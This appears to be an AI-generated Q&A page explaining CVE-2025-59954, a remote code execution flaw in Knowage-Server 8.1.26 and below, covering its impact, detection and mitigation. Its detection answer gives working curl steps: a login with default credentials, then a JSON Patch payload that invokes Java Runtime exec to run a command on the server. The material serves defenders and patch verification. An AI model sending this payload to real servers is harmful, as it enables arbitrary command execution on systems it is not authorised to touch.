Can you explain this vulnerability to me?

CVE-2025-59954 is a high-severity remote code execution vulnerability in Knowage-Server versions 8.1.26 and below. It arises from unsafe use of the org.apache.commons.jxpath.JXPathContext class in the MetaService.java file, which allows an authenticated normal user to execute arbitrary commands on the server. An attacker can exploit this by logging in with a normal user account, obtaining a session ID, creating a model for the session, and then sending a specially crafted JSON Patch request that triggers Java runtime execution on the server, such as creating files or running commands. This vulnerability is fixed in version 8.1.27 by disabling Java method calls in XPath expressions. [1, 2]

Useful 0 Not Useful 0

How can this vulnerability impact me? :

This vulnerability allows an authenticated user with normal privileges to execute arbitrary code on the Knowage server remotely. This can lead to full compromise of the server, including unauthorized access to data, modification or deletion of files, installation of malware, or disruption of services. Since the attacker can run commands on the server, the impact is severe and can affect the confidentiality, integrity, and availability of the system and its data. [1]

Useful 0 Not Useful 0

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by attempting to reproduce the exploit steps on a Knowage-Server instance prior to version 8.1.27. Specifically, after logging in with a normal user account (e.g., username: 'biuser', password: 'biuser'), you can obtain an authorized session ID via a GET request to the '/knowagemeta/restful-services/1.0/pages/edit' endpoint. Then, create a model for the session by sending a POST request to '/knowagemeta/restful-services/1.0/metaWeb/create' with the appropriate JSON payload and session cookie. Finally, send a specially crafted POST request to '/knowagemeta/restful-services/1.0/metaWeb/checkRelationships' with a JSON Patch payload that attempts to execute a command such as 'touch /tmp/success'. If the file '/tmp/success' is created on the server, the vulnerability is present. Example commands using curl would be: 1. Login and get session cookie: curl -c cookies.txt -X POST -d '{"username":"biuser","password":"biuser"}' https://<knowage-server>/login 2. Get authorized session ID: curl -b cookies.txt https://<knowage-server>/knowagemeta/restful-services/1.0/pages/edit 3. Create model: curl -b cookies.txt -H 'Content-Type: application/json' -X POST -d '{"datasourceId":1,"modelName":"testModel"}' https://<knowage-server>/knowagemeta/restful-services/1.0/metaWeb/create 4. Trigger exploit: curl -b cookies.txt -H 'Content-Type: application/json' -X POST -d '[{"op":"move","from":"exec(java.lang.Runtime.getRuntime(),\'touch /tmp/success\')","path":"/some/path"}]' https://<knowage-server>/knowagemeta/restful-services/1.0/metaWeb/checkRelationships Checking for the presence of '/tmp/success' on the server confirms exploitation. [1]

Useful 0 Not Useful 0

What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation step is to upgrade the Knowage-Server to version 8.1.27 or later, where this vulnerability is fixed. The fix involves using a secure builder for the JXPathContext that disables Java method calls in XPath expressions, preventing arbitrary code execution. If upgrading immediately is not possible, restrict access to the vulnerable endpoints and ensure that only trusted users have authenticated access, as exploitation requires authentication. Monitoring and blocking suspicious POST requests to '/knowagemeta/restful-services/1.0/metaWeb/checkRelationships' may also help reduce risk until the patch is applied. [1, 2]

Useful 0 Not Useful 0